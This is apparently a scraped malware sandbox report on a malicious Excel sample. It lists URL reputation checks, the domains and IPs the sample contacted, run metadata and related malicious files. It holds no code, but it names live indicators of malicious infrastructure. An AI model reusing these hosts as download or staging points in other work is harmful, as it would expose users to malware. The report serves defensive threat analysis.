      https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%VirustotalBrowse
      https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
      https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://ncus.pagecontentsync.0%URL Reputationsafe
      https://ncus.pagecontentsync.0%URL Reputationsafe
      https://ncus.pagecontentsync.0%URL Reputationsafe
      https://ncus.pagecontentsync.0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe
      https://ovisualuiapp.azurewebsites.net/pbiagave/0%VirustotalBrowse
      https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
      https://directory.services.0%URL Reputationsafe
      https://directory.services.0%URL Reputationsafe
      https://directory.services.0%URL Reputationsafe
      https://directory.services.0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      academy.haleemcampus.com
      		108.179.232.80
      		truefalseunknown
      psq.com.mx
      		162.241.2.112
      		truefalseunknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
        		high
        https://login.microsoftonline.com/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
          		high
          https://shell.suite.office.com:14430A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
            		high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
              		high
              https://autodiscover-s.outlook.com/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                		high
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                  		high
                  https://cdn.entity.0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://api.addins.omex.office.net/appinfo/query0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                    		high
                    https://clients.config.office.net/user/v1.0/tenantassociationkey0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                      		high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                        		high
                        https://powerlift.acompli.net0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://lookup.onenote.com/lookup/geolocation/v10A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                          		high
                          https://cortana.ai0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                            		high
                            https://cloudfiles.onenote.com/upload.aspx0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                              		high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                		high
                                https://entitlement.diagnosticssdf.office.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                  		high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                    		high
                                    https://api.aadrm.com/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                      		high
                                      https://api.microsoftstream.com/api/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                        		high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                          		high
                                          https://cr.office.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                            		high
                                            https://portal.office.com/account/?ref=ClientMeControl0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                              		high
                                              https://graph.ppe.windows.net0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                		high
                                                https://res.getmicrosoftkey.com/api/redemptionevents0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://powerlift-frontdesk.acompli.net0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://tasks.office.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                  		high
                                                  https://officeci.azurewebsites.net/api/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                    		high
                                                    https://store.office.cn/addinstemplate0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                      		high
                                                      https://globaldisco.crm.dynamics.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                        		high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                          		high
                                                          https://store.officeppe.com/addinstemplate0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://dev0-api.acompli.net/autodetect0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.odwebp.svc.ms0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://api.powerbi.com/v1.0/myorg/groups0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                            		high
                                                            https://web.microsoftstream.com/video/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                              		high
                                                              https://graph.windows.net0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                		high
                                                                https://dataservice.o365filtering.com/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://officesetup.getmicrosoftkey.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://analysis.windows.net/powerbi/api0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                  		high
                                                                  https://prod-global-autodetect.acompli.net/autodetect0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                    		high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                      		high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                        		high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                          		high
                                                                          https://ncus.contentsync.0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                            		high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                              		high
                                                                              http://weather.service.msn.com/data.aspx0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                		high
                                                                                https://apis.live.net/v5.0/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                  		high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                    		high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                      		high
                                                                                      https://management.azure.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                        		high
                                                                                        https://wus2.contentsync.0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://incidents.diagnostics.office.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                          		high
                                                                                          https://clients.config.office.net/user/v1.0/ios0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                            		high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                              		high
                                                                                              https://o365auditrealtimeingestion.manage.office.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                		high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                  		high
                                                                                                  https://api.office.net0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                    		high
                                                                                                    https://incidents.diagnosticssdf.office.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                      		high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                      • 0%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                        		high
                                                                                                        https://entitlement.diagnostics.office.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                          		high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                            		high
                                                                                                            https://substrate.office.com/search/api/v2/init0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                              		high
                                                                                                              https://outlook.office.com/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                		high
                                                                                                                https://storage.live.com/clientlogs/uploadlocation0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                  		high
                                                                                                                  https://templatelogging.office.com/client/log0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                    		high
                                                                                                                    https://outlook.office365.com/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                      		high
                                                                                                                      https://webshell.suite.office.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                        		high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                          		high
                                                                                                                          https://management.azure.com/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                            		high
                                                                                                                            https://login.windows.net/common/oauth2/authorize0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                              		high
                                                                                                                              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://graph.windows.net/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                		high
                                                                                                                                https://api.powerbi.com/beta/myorg/imports0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://devnull.onenote.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://ncus.pagecontentsync.0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://messaging.office.com/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://augloop.office.com/v20A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://skyapi.live.net/Activity/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/mac0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://dataservice.o365filtering.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://api.cortana.ai0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://onedrive.live.com0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://ovisualuiapp.azurewebsites.net/pbiagave/0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                  • 0%, Virustotal, Browse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://visio.uservoice.com/forums/368202-visio-on-devices0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://directory.services.0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://login.windows-ppe.net/common/oauth2/authorize0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://staging.cortana.ai0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      108.179.232.80
                                                                                                                                                      		academy.haleemcampus.comUnited States
                                                                                                                                                      		46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                      162.241.2.112
                                                                                                                                                      		psq.com.mxUnited States
                                                                                                                                                      		26337OIS1USfalse

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                      Analysis ID:441923
                                                                                                                                                      Start date:29.06.2021
                                                                                                                                                      Start time:17:46:18
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 5m 32s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:light
                                                                                                                                                      Sample file name:statistic-1496367785.xls
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:17
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal80.expl.evad.winXLS@5/7@2/2
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xls
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Found warning dialog
                                                                                                                                                      • Click Ok
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Max analysis timeout: 220s exceeded, the analysis took too long
                                                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 104.42.151.234, 40.88.32.150, 13.88.21.125, 52.109.76.68, 52.109.88.38, 93.184.220.29, 204.79.197.200, 13.107.21.200, 20.50.102.62, 20.54.7.98, 40.112.88.60, 93.184.221.240, 13.107.4.50, 80.67.82.235, 80.67.82.211
                                                                                                                                                      • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, cs9.wac.phicdn.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, www.bing.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, c-0001.c-msedge.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, afdap.au.au-msedge.net, ris.api.iris.microsoft.com, au.au-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      108.179.232.80statistic-1496367785.xlsGet hashmaliciousBrowse
                                                                                                                                                        33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                          33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                            7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                              7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                statistic-462462953.xlsGet hashmaliciousBrowse
                                                                                                                                                                  statistic-462462953.xlsGet hashmaliciousBrowse
                                                                                                                                                                    statistic-1403316517.xlsGet hashmaliciousBrowse
                                                                                                                                                                      statistic-1403316517.xlsGet hashmaliciousBrowse
                                                                                                                                                                        statistic-260077031.xlsGet hashmaliciousBrowse
                                                                                                                                                                          statistic-260077031.xlsGet hashmaliciousBrowse
                                                                                                                                                                            5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                              5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                statistic-1066846651.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  statistic-1066846651.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    162.241.2.112statistic-1496367785.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                            7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              statistic-462462953.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                statistic-462462953.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  statistic-1403316517.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                    statistic-1403316517.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                      statistic-260077031.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                        statistic-260077031.xlsGet hashmaliciousBrowse
